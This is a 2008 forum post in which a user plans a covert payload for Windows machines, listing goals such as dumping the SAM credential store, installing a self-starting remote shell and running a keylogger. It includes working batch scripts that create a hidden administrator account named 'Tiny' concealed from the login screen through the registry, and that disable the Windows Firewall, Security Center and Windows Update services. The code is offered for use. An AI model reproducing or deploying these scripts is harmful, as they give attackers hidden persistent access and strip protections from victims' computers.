DingleBerries Posted November 18, 2008 Share Posted November 18, 2008 So Ive been contemplating making a new payload for a while... These are some of the things that I want to inplement: 1. No .VBS or .NET 2. Mostly command line, and the .BATs will all be .EXEs, just because i like those better 3. Dump SAM or create a New admin, via command line, preferable both 4. Install a remote shell, this part is already take care of 5. Dump a list of all users on the computer And thats about it. The remote shell autoruns and adds itself to the registry. I want to keep this as small and as basic as possible.. So there isnt any slurping of docs and what not, maybe pics ;). The dumping part will be done via command lin, ie. run rs.exe, because the shell copies its self onces its ran. Other than that i have a good keylogger, runs low on mem and can be customized... Right now I am still looking for ideas, so if you have any let me know. This is the code that will be used for the Admin account. Invisible User:Tiny @echo off net user Tiny password /add && net localgroup administrators Tiny /add echo Windows Registry Editor Version 5.00> c:\hide.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg echo "Tiny"=dword:00000000>> c:\hide.reg REGEDIT /S c:\hide.REG DEL /Q c:\hide.REG attrib +r +a +s +h %SystemDrive%\docume~1\Tiny Exit Also I am thinking of just dumping the .reg ot HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ because it contains all the users, that way we can limit 3rd party software. Like so: REGEDIT /E EDIT_PATH_OF_DRIVE\FILE.REG "HKEY_LOCAL\----" Disable Windows Firewall: @echo off net stop "Security Center" net stop SharedAccess reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.